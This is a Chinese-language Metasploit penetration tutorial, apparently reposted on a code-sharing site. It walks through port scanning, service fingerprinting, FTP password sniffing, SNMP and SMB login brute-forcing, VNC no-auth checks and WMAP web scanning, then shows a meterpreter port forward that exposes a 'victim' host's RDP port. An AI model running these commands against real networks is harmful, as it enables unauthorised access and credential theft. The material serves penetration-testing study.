Metasploit 簡單滲透應用


1.Metasploit端口掃描:

在終端輸入msfconsole或直接從應用選metasploit

進入msf>nmap -v -sV 192.168.126.128  與nmap結果一樣

 

用msf自帶模塊,msf>:

 

search portscan

 

use auxiliary/scanner/portscan/syn

 

show options

 

set INTERFACE etho0  設置網卡

 

set port 445 設置掃描端口

 

set RHOSTS 192.168.126.0/24  設置ip地址

 

set THREADS 100 設置線程

 

run

 

出結果

 

exit 退出

quit 退出上一步

 

 

 

2.用其他模塊

use auxiliary/scanner/portscan/tcp  

 

show options

 

set ......

 

run 

 

 

 

 

 

3.metasploit smb獲取系統信息

 

 

use auxiliary/scanner/smb/smb_version

 

set RHOSTS IP或段

 

run

 

出結果

 

 

 

4.Metsploit服務識別

 

ssh服務識別:

 

use auxiliary/scanner/ssh/ssh_version

 

show options

 

set RHOSTS ip1 ip2

 

run

 

出結果

 

 

5.ftp識別:

 

use auxiliary/scanner/ftp/ftp_version

 

show options

 

set RHOSTS IP  設置目標ip地址

 

run

 

出結果

 

 

 

6.metasploit密碼嗅探

 

use auxiliary/sniffer/psnuffle

 

show options

 

run

 

只要ftp登錄 就會查到

 

 

 

7.metasploit SNMP掃描與枚舉

 

簡單網絡管理議(snmp)

 

search snmp

掃描:

use auxiliary/scanner/snmp/snmp_login

 

set options

 

set RHOSTS IP或段

 

set THREADS 10

 

run

 

枚舉:

use auxiliary/scanner/snmp/snmp_enum

 

set RHOSTS IP

 

SET THREADS 10

 

run

 

 

8.metasploit SMB登錄檢查

 

SMB是一種計算機協議,是用於在計算機間共享文件、打印機、串口等

 

use auxiliary/scanner/smb/smb_login

 

show options

 

set RHOSTS ip

 

set SMBUser administrator

 

set THREADS 10

 

run

 

 

 

9.metasploit VNC身份驗證

 

VNC (Virtual Network Console)是虛擬網絡控制台的縮寫。它 是一款優秀的遠程控制工具軟件

 

use auxiliary/scanner/vnc/vnc_none_auth

 

show options

 

set RHOSTS ip或段

 

set THREADS 50

 

run

 

 

10.metasploit WMAP Web 掃描

 

啟動msfconsole

 

啟動load wmap

 

wmap_sites  查看選項

 

wmap_sites -a http://www.0day.co  添加url

 

wmap_sites -l  顯示信息 ip

 

wmap_targets -h  幫助

 

wmap_targets -t http://ip

 

wmap_run -h

 

 

 

meterpreter基本隧道代理

portfwd

portfwd 是meterpreter提供的一種基本的端口轉發。porfwd可以反彈單個端口到本地,並且監聽.使用方法如下:

meterpreter > portfwd 
0 total local port forwards.
meterpreter > portfwd  -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
    -L <opt>  The local host to listen on (optional).     -h        Help banner.     -l <opt>  The local port to listen on.     -p <opt>  The remote port to connect to.     -r <opt>  The remote host to connect to.

使用實例介紹:

反彈10.1.1.129端口3389到本地2222並監聽那么可以使用如下方法:

meterpreter > portfwd add -l 2222 -r 10.1.1.129 -p 3389
[*] Local TCP relay created: 0.0.0.0:2222 <-> 10.1.1.129:3389
meterpreter > portfwd 
0: 0.0.0.0:2222 -> 10.1.1.129:3389
1 total local port forwards.

已經轉發成功,下面來驗證下:

root@kali:~# netstat -an | grep "2222"
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN

可以看到已經成功監聽2222端口

接着連接本地2222端口即可連接受害機器10.1.1.129 3389端口,如下:

root@kali:~# rdesktop 127.1.1.0:2222

可以看到,已經成功連接到10.1.1.129 的3389端口

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM